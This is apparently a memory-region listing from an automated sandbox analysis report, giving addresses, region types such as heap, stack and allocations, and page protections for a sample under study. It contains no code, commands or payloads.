page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
22D6000
|
heap
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
2CE9202B000
|
heap
|
page read and write
|
||
|
4300000
|
heap
|
page read and write
|
||
|
AE7000
|
heap
|
page read and write
|
||
|
2302000
|
heap
|
page read and write
|
||
|
22B9000
|
heap
|
page read and write
|
||
|
1ECAE000
|
stack
|
page read and write
|
||
|
2CE91F20000
|
heap
|
page read and write
|
||
|
1F614000
|
heap
|
page read and write
|
||
|
2862000
|
heap
|
page read and write
|
||
|
2826000
|
heap
|
page read and write
|
||
|
2CE9762C000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
4230000
|
direct allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
2CE975D0000
|
trusted library allocation
|
page read and write
|
||
|
2610000
|
heap
|
page read and write
|
||
|
4AF6000
|
trusted library allocation
|
page read and write
|
||
|
505E000
|
trusted library allocation
|
page read and write
|
||
|
1F54C000
|
unclassified section
|
page execute and read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
2CE97520000
|
trusted library allocation
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
2CE91F50000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
22DE000
|
heap
|
page read and write
|
||
|
2CE9205B000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
742E000
|
stack
|
page read and write
|
||
|
EF9867E000
|
unkown
|
page readonly
|
||
|
1F4A0000
|
heap
|
page read and write
|
||
|
2326000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
2CE97480000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
5088000
|
trusted library allocation
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
738000
|
heap
|
page read and write
|
||
|
348F000
|
stack
|
page read and write
|
||
|
2260000
|
heap
|
page read and write
|
||
|
74ED000
|
stack
|
page read and write
|
||
|
287C000
|
heap
|
page read and write
|
||
|
5042000
|
trusted library allocation
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
26B0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
22BA000
|
heap
|
page read and write
|
||
|
EF98F7B000
|
stack
|
page read and write
|
||
|
2CE920B0000
|
heap
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
9FE000
|
stack
|
page read and write
|
||
|
7161000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
24C4000
|
heap
|
page read and write
|
||
|
2CE92802000
|
heap
|
page read and write
|
||
|
285E000
|
heap
|
page read and write
|
||
|
2FBE000
|
stack
|
page read and write
|
||
|
8EB000
|
heap
|
page read and write
|
||
|
2740000
|
direct allocation
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
509D000
|
trusted library allocation
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
2CE93470000
|
trusted library allocation
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
1F6E1000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
835E000
|
stack
|
page read and write
|
||
|
7A9000
|
unkown
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
1FAB1000
|
direct allocation
|
page execute and read and write
|
||
|
2B8D000
|
stack
|
page read and write
|
||
|
2822000
|
heap
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
A5E000
|
stack
|
page read and write
|
||
|
67D000
|
stack
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
1F110000
|
unclassified section
|
page execute and read and write
|
||
|
1F48B000
|
heap
|
page read and write
|
||
|
2884000
|
heap
|
page read and write
|
||
|
1DF30000
|
heap
|
page read and write
|
||
|
1F5AE000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2CE9770B000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
80D0000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
752000
|
heap
|
page read and write
|
||
|
1F615000
|
heap
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
1F58A000
|
heap
|
page read and write
|
||
|
2CE97691000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
3038000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
22F8000
|
heap
|
page read and write
|
||
|
610000
|
trusted library allocation
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
22B4000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
EF98577000
|
stack
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2CE92091000
|
heap
|
page read and write
|
||
|
1EE2D000
|
stack
|
page read and write
|
||
|
22DE000
|
heap
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
2CE97559000
|
trusted library allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
2303000
|
heap
|
page read and write
|
||
|
8E7000
|
heap
|
page read and write
|
||
|
1EB6F000
|
stack
|
page read and write
|
||
|
1F570000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1F45C000
|
heap
|
page read and write
|
||
|
22E9000
|
heap
|
page read and write
|
||
|
2884000
|
heap
|
page read and write
|
||
|
24CD000
|
stack
|
page read and write
|
||
|
2CE920B4000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
2829000
|
heap
|
page read and write
|
||
|
83DE000
|
stack
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
1F5E3000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
1F605000
|
heap
|
page read and write
|
||
|
27F7000
|
heap
|
page read and write
|
||
|
4240000
|
direct allocation
|
page read and write
|
||
|
80F000
|
stack
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2CE97500000
|
trusted library allocation
|
page read and write
|
||
|
285E000
|
heap
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
2BE8000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
2CE97B70000
|
trusted library allocation
|
page read and write
|
||
|
1F2F1000
|
heap
|
page read and write
|
||
|
2303000
|
heap
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
22B4000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
42D0000
|
direct allocation
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
2CE97530000
|
trusted library allocation
|
page read and write
|
||
|
8420000
|
trusted library allocation
|
page execute and read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
2CE97850000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2780000
|
direct allocation
|
page read and write
|
||
|
1E850000
|
remote allocation
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
230C000
|
heap
|
page read and write
|
||
|
18F000
|
stack
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
2873000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
1F596000
|
heap
|
page read and write
|
||
|
2884000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CE9770A000
|
heap
|
page read and write
|
||
|
AE9000
|
heap
|
page read and write
|
||
|
2E6D000
|
stack
|
page read and write
|
||
|
1F169000
|
unclassified section
|
page execute and read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
2750000
|
direct allocation
|
page read and write
|
||
|
55C000
|
heap
|
page read and write
|
||
|
84F0000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
8640000
|
direct allocation
|
page execute and read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
27BA000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
7A6000
|
unkown
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
22B0000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
7FD0000
|
trusted library allocation
|
page read and write
|
||
|
1F3E3000
|
heap
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
48B0000
|
heap
|
page read and write
|
||
|
70F7000
|
trusted library allocation
|
page read and write
|
||
|
1EBAB000
|
stack
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
6B2E000
|
stack
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
9CD000
|
heap
|
page read and write
|
||
|
1E8CF000
|
stack
|
page read and write
|
||
|
22B4000
|
heap
|
page read and write
|
||
|
2886000
|
heap
|
page read and write
|
||
|
503F000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
5073000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
1F48E000
|
heap
|
page read and write
|
||
|
2CE92073000
|
heap
|
page read and write
|
||
|
2385000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
8090000
|
heap
|
page read and write
|
||
|
2F3D000
|
stack
|
page read and write
|
||
|
54E000
|
stack
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
59C9000
|
trusted library allocation
|
page read and write
|
||
|
788000
|
unkown
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2CE9207D000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
2CBF000
|
stack
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
9B5000
|
heap
|
page read and write
|
||
|
2CE9765F000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
42B0000
|
direct allocation
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
2CE97830000
|
trusted library allocation
|
page read and write
|
||
|
1F5D2000
|
heap
|
page read and write
|
||
|
2CE975F0000
|
trusted library allocation
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
2CE976D1000
|
heap
|
page read and write
|
||
|
1E88E000
|
stack
|
page read and write
|
||
|
22B9000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
701C1000
|
unkown
|
page execute read
|
||
|
2CE97654000
|
heap
|
page read and write
|
||
|
6FD0000
|
heap
|
page read and write
|
||
|
22C3000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
2884000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
22B4000
|
heap
|
page read and write
|
||
|
1F5C2000
|
heap
|
page read and write
|
||
|
4537000
|
heap
|
page read and write
|
||
|
EF9987B000
|
stack
|
page read and write
|
||
|
248F000
|
stack
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
2CE978A0000
|
remote allocation
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
4AE7000
|
trusted library allocation
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
782000
|
unkown
|
page read and write
|
||
|
4515000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B4D000
|
trusted library allocation
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
4260000
|
direct allocation
|
page read and write
|
||
|
2CE975F0000
|
trusted library allocation
|
page read and write
|
||
|
1F546000
|
unclassified section
|
page execute and read and write
|
||
|
1F183000
|
unclassified section
|
page execute and read and write
|
||
|
2CE97840000
|
trusted library allocation
|
page read and write
|
||
|
450A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
2CE97500000
|
trusted library allocation
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
1F615000
|
heap
|
page read and write
|
||
|
2798000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2EAD000
|
stack
|
page read and write
|
||
|
1F5AE000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
5B34000
|
trusted library allocation
|
page read and write
|
||
|
7FA7000
|
stack
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
59A1000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
4270000
|
direct allocation
|
page read and write
|
||
|
93C000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
933000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
1F5BF000
|
heap
|
page read and write
|
||
|
1E540000
|
direct allocation
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2886000
|
heap
|
page read and write
|
||
|
1F5AE000
|
heap
|
page read and write
|
||
|
508B000
|
trusted library allocation
|
page read and write
|
||
|
7A4000
|
unkown
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
1F62F000
|
heap
|
page read and write
|
||
|
6CC0000
|
direct allocation
|
page read and write
|
||
|
1F16D000
|
unclassified section
|
page execute and read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
8D80000
|
direct allocation
|
page execute and read and write
|
||
|
6BAE000
|
stack
|
page read and write
|
||
|
44E4000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2CE93441000
|
trusted library allocation
|
page read and write
|
||
|
2CE920AC000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
92F000
|
stack
|
page read and write
|
||
|
53E000
|
stack
|
page read and write
|
||
|
1F5CA000
|
heap
|
page read and write
|
||
|
1F5C8000
|
heap
|
page read and write
|
||
|
5093000
|
trusted library allocation
|
page read and write
|
||
|
2CE920A0000
|
heap
|
page read and write
|
||
|
1F5BF000
|
heap
|
page read and write
|
||
|
288E000
|
heap
|
page read and write
|
||
|
44ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CE976C8000
|
heap
|
page read and write
|
||
|
22C8000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
664000
|
heap
|
page read and write
|
||
|
2CE920B0000
|
heap
|
page read and write
|
||
|
1E5AE000
|
stack
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page read and write
|
||
|
1E850000
|
remote allocation
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
2329000
|
heap
|
page read and write
|
||
|
2C92000
|
heap
|
page read and write
|
||
|
26D0000
|
trusted library allocation
|
page read and write
|
||
|
2CE92113000
|
heap
|
page read and write
|
||
|
22B0000
|
heap
|
page read and write
|
||
|
230B000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2CE97702000
|
heap
|
page read and write
|
||
|
48A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F571000
|
heap
|
page read and write
|
||
|
808F000
|
stack
|
page read and write
|
||
|
786000
|
unkown
|
page read and write
|
||
|
5057000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
2884000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
288B000
|
heap
|
page read and write
|
||
|
68E000
|
stack
|
page read and write
|
||
|
EF9877E000
|
stack
|
page read and write
|
||
|
22C6000
|
heap
|
page read and write
|
||
|
2CE92904000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
701DD000
|
unkown
|
page read and write
|
||
|
5076000
|
trusted library allocation
|
page read and write
|
||
|
2CE920B4000
|
heap
|
page read and write
|
||
|
84C6000
|
heap
|
page read and write
|
||
|
6CE000
|
stack
|
page read and write
|
||
|
1E92C000
|
stack
|
page read and write
|
||
|
1ECEC000
|
stack
|
page read and write
|
||
|
59E000
|
stack
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
31B6000
|
heap
|
page read and write
|
||
|
548000
|
heap
|
page read and write
|
||
|
2316000
|
heap
|
page read and write
|
||
|
2510000
|
heap
|
page read and write
|
||
|
26B1000
|
heap
|
page read and write
|
||
|
2862000
|
heap
|
page read and write
|
||
|
5069000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
1F48B000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
177000
|
stack
|
page read and write
|
||
|
50C7000
|
trusted library allocation
|
page read and write
|
||
|
933000
|
heap
|
page read and write
|
||
|
804D000
|
stack
|
page read and write
|
||
|
1E6AF000
|
stack
|
page read and write
|
||
|
2CE92095000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
2CE920FF000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
287E000
|
heap
|
page read and write
|
||
|
2888000
|
heap
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
EF9997E000
|
unkown
|
page readonly
|
||
|
281B000
|
heap
|
page read and write
|
||
|
6A9F000
|
stack
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
1F5C8000
|
heap
|
page read and write
|
||
|
1F5C2000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
2309000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2CE920B0000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
2829000
|
heap
|
page read and write
|
||
|
7B3000
|
unkown
|
page read and write
|
||
|
7B7000
|
heap
|
page read and write
|
||
|
88E000
|
stack
|
page read and write
|
||
|
7100000
|
heap
|
page execute and read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
2CE975E0000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
26DE000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2CE92097000
|
heap
|
page read and write
|
||
|
1F5C8000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
25CD000
|
stack
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
82DC000
|
stack
|
page read and write
|
||
|
2CE9291A000
|
heap
|
page read and write
|
||
|
2CE92102000
|
heap
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2B0D000
|
stack
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
232B000
|
heap
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
2CE97502000
|
trusted library allocation
|
page read and write
|
||
|
1FAC6000
|
direct allocation
|
page execute and read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
4500000
|
trusted library allocation
|
page read and write
|
||
|
22C2000
|
heap
|
page read and write
|
||
|
2C1A000
|
heap
|
page read and write
|
||
|
2CE92013000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
42F0000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
831C000
|
stack
|
page read and write
|
||
|
9C3000
|
heap
|
page read and write
|
||
|
7DA000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
7FE0000
|
trusted library allocation
|
page read and write
|
||
|
2CE97700000
|
heap
|
page read and write
|
||
|
1F5AE000
|
heap
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
1F6B0000
|
heap
|
page read and write
|
||
|
250E000
|
stack
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
287C000
|
heap
|
page read and write
|
||
|
8FC000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2620000
|
heap
|
page read and write
|
||
|
42C0000
|
direct allocation
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page execute and read and write
|
||
|
2303000
|
heap
|
page read and write
|
||
|
701DF000
|
unkown
|
page readonly
|
||
|
1E560000
|
direct allocation
|
page read and write
|
||
|
22BE000
|
heap
|
page read and write
|
||
|
1F60E000
|
heap
|
page read and write
|
||
|
193000
|
stack
|
page read and write
|
||
|
1FA9B000
|
unclassified section
|
page execute and read and write
|
||
|
2CE920AA000
|
heap
|
page read and write
|
||
|
230A000
|
heap
|
page read and write
|
||
|
1F680000
|
heap
|
page read and write
|
||
|
2CE92815000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
EF98E7E000
|
unkown
|
page readonly
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
22B0000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
287C000
|
heap
|
page read and write
|
||
|
2CE92800000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
1F5E6000
|
heap
|
page read and write
|
||
|
701D6000
|
unkown
|
page readonly
|
||
|
EF9907E000
|
unkown
|
page readonly
|
||
|
2CE98000000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2760000
|
direct allocation
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
9D000
|
stack
|
page read and write
|
||
|
22C9000
|
heap
|
page read and write
|
||
|
2883000
|
heap
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
27A5000
|
heap
|
page read and write
|
||
|
2CE9295A000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
285B000
|
heap
|
page read and write
|
||
|
29BE000
|
stack
|
page read and write
|
||
|
EF9A17E000
|
unkown
|
page readonly
|
||
|
3270000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2CE975D0000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
839C000
|
stack
|
page read and write
|
||
|
93C000
|
heap
|
page read and write
|
||
|
7241000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2CE97642000
|
heap
|
page read and write
|
||
|
2CE91F80000
|
trusted library allocation
|
page read and write
|
||
|
1F2F1000
|
heap
|
page read and write
|
||
|
5B48000
|
trusted library allocation
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
270C000
|
stack
|
page read and write
|
||
|
1F5E3000
|
heap
|
page read and write
|
||
|
7120000
|
heap
|
page read and write
|
||
|
84AC000
|
heap
|
page read and write
|
||
|
8175000
|
trusted library allocation
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
1F571000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
30EE000
|
stack
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
1EA2C000
|
stack
|
page read and write
|
||
|
2CE974E0000
|
trusted library allocation
|
page read and write
|
||
|
2886000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
323F000
|
stack
|
page read and write
|
||
|
59A9000
|
trusted library allocation
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
2CE92117000
|
heap
|
page read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
22DC000
|
heap
|
page read and write
|
There are 954 hidden memdumps, click here to show them.